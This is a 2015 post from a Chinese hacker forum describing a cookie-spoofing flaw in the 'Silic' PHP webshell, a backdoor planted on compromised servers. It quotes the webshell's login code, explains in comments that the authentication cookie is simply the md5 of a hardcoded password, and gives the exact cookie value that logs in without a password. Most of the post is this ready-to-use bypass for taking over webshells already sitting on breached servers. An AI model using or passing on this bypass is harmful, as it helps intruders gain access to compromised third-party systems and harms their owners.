搜索
查看: 818|回复: 0

Silic PHP大马Cookie欺骗漏洞

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2015-9-1 23:59:34 | 显示全部楼层 |阅读模式
  1. $password="ebd9a3c106064a255aaee28b6eb4f21c";
  2.   
  3. if($_COOKIE['admin_silicpass'] != md5($password)) //如果cookie 里面的admin_silicpass 不等于  md5($password)
  4. {
  5.         ob_start();
  6.         $MSG_TOP = 'LOGIN';
  7.         if(isset($passt))
  8.         {
  9.                 $cookietime = time() + 24 * 3600;
  10.                 setcookie('admin_silicpass',md5($passt),$cookietime); //问题就是这里  知道了cookied 计算方法完全可以伪造
  11.                 if(md5($passt) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');} //看这行 也就是说 $password == $passt 而$password 我们又是知道的 所以就呵呵了
  12.                 else{$MSG_TOP = 'PASS IS FALSE';}
  13.         }
  14. Root_Login($MSG_TOP);
  15. ob_end_flush();
  16. exit;
  17. }
复制代码


更加这个$password
设置cookie admin_silicpass=b571a9d50cea9d7962781be88992b52a 免密码直接登录了
漏洞比较鸡肋,但不是没用,所以记录下。
[via@t00ls]

您可以更新记录, 让好友们知道您在做什么...
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表